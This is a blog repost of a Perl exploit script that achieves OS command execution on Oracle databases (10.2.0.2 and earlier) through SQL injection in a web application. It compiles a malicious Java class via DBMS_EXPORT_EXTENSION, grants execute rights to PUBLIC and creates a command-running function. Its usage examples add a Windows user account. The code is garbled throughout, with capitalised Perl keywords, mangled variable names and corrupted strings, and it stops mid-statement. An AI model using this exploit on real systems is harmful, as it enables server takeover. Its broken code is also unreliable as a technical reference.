Baishen blog
Two articles about this:
http://www.bkjia.com/Article/200810/30019.html
http://www.red-database-security... nds_via_webapp.html
CODE:
#! /Usr/bin/env perl
Use LWP: Simple;
Print "-----------------------------------------------------------------------";
Print "Oracle command execution via web apps ";
Print "sid-at-NotSoSecure // www.notsosecure.com ";
Print "suported versions <= 10.2.0.2, all platforms ";
Print "------------------------------------------------------------------------";
If (@ ARGV <2)
{
Print "Usage :";
Print "ora_cmd_exec.pl <URL> <cmd-to-exec> ";
Print "";
Print "EXAMPLE:./ora_rj_exec.pl" http: // 192.168.172.129: 81/ora3.php? Name = s "" net user notsosecure n0tsos3cur3/add "";
Print "EXAMPLE:./ora_rj_exec.pl" http: // 192.168.172.129: 81/ora3.php? Id = 100 "" net user notsosecure n0tsos3cur3/add "";
Print "------------------------------------------------------------------------";
Exit ();
}
My $ url_1 = $ ARGV [0]. "and 1 = ";
My $ javalib = "(select SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES (FOO, BAR, DBMS_OUTPUT". PUT (: P1); EXECUTE IMMEDIATE
Declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate create or replace and compile java source named
"LinxUtil" as import java. io. *; public class LinxUtil extends Object {public static String runCMD (String args)
{Try {BufferedReader myReader = new BufferedReader (new InputStreamReader (runtime.getruntime(.exe c (args). getInputStream ()
); String stemp, str = ""; while (stemp = myReader. readLine ())! = Null) str % 2b = stemp % 2b "\ n"; myReader. close (); return
Str;} catch (Exception e) {return e. toString () ;}} public static String readFile (String filename) {try {BufferedReader
MyReader = new BufferedReader (new FileReader (filename); String stemp, str = ""; while (stemp = myReader. readLine ())! =
Null) str % 2b = stemp % 2b "\ n"; myReader. close (); return str;} catch (Exception e) {return
E. toString () ;}}; END; --, SYS, 0) from dual )--";
My $ javaperm = "(select SYS. Values (FOO, BAR, DBMS_OUTPUT". PUT (: P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate begin dbms_java.grant_permission (
PUBLIC, SYS: java. io. FilePermission, <>, execute); end; END; --, SYS, 0, 1) from dual )--";
My $ export _exec_func = "(select SYS. Values (FOO, BAR, DBMS_OUTPUT". PUT (: P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate create or replace function
LinxRunCMD (p_cmd in varchar2) return varchar2 as language java name LinxUtil. runCMD (java. lang. string) return String; END; --, SYS, 0, 1) from dual )--";
My $ export _exec_func_priv = "(select SYS. Values (FOO, BAR, DBMS_OUTPUT". PUT (: P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate grant all on LinxRunCMD
To public; END; --, SYS, 0, 0) from dual )--";
My $1__1 = $ ARGV [1];
My $ cmd_exec = "(select sys.LinxRunCMD(cmd.exe/c". $ cmd_1. ") from dual )--";
Print "Step 1. Creating Java Library ...";
Print "--------------------------------";
My $ url = $ url_1. $ javalib;
My $ content = get $ url;
Die "Couldnt get $ url" unless defined $ content;
If ($ content = ~ M/warning/I ){
Print "-----------------------------------------------";
Print "ERROR at STAGE 1 occured !!!... Did you provide me the URL in the format, I want ?? ";
Print "-----------------------------------------------";
} Else {
Print "NO errors encountered... proceeding to step... 2 ";
Print "--------------------------------";
# Print $ content;
}
#-----------------------
Print "Step 2. granting java execute privileges ...";
My $ url = $ url_1. $ javaperm;
My $ content = get $ url;
Die "Couldnt get $ url" unless defined $ content;
If ($ content = ~ M/warning/I ){
Print "-----------------------------------------------";
Print "ERROR at STAGE 2 occured !!!... Something was not right ..";
Print "-----------------------------------------------";
Print "I will proceed, however, there is a possibility that the attack will fail ";
} Else {
Print "NO errors encountered... proceeding to step... 3 ";
Print "--------------------------------";
# Print $ content;
}
#-----------------------
Print "Step 3. creating funtion for command execution ...";
My $ url = $ url_1. $ pai_exec_func;
My $ content = get $ url;
Die "Couldnt get $ url" unless defined $ content;
If ($ content = ~ M/warning/I ){
Print "-----------------------------------------------";
Print "ERROR at STAGE 3 occured !!!... Something was not right ..";
Print "-----------------------------------------------";
Print "I will proceed, however, there is a possibility that the attack will fail ";
} Else {
Print "NO errors encountered... proceeding to step... 4 ";
Print "--------------------------------";
# Print $ content;
}
#-----------------------
Print "Step 4. making function executable by all users ...";
My $ url = $ url_1. $ pai_exec_func_priv;
My $ content = get $ url;
Die "Couldnt get $ url" unless defined $ content;
If ($ content = ~ M/warning/I ){
Print "-----------------------------------------------";
Print "ERROR at STAGE 4 occured !!!... Something was not right ..";
Print "-----------------------------------------------";
Print "I will proceed, however, there is a possibility that the attack will fail ";
} Else {
Print "NO errors encountered... proceeding to step... 5 ";
Print "--------------------------------";
# Print $ content;
}
#-----------------------
Print "Step 5. RIGHT !!!, By now we shoshould have a function sys. LinxRunCMD through which we can execute commands ...";
Print "--------------------------------";
Print "You shoshould be able to execute this function as: select sys.linxrun.pdf (.exe/c net user notsosecure n0ts3cur3/add) from dual ";
Print "I will execute the command you told me to execute... you wont be able to see the output though :(";
My $ url = $ url_1. $ pai_exec;
My $ content = get $ url;
Die "Couldnt get $ url" unless defined $ content;
If ($ content = ~ M/warning/I ){
Print "-----------------------------------------------";
Print "ERROR at STAGE 5 occured !!!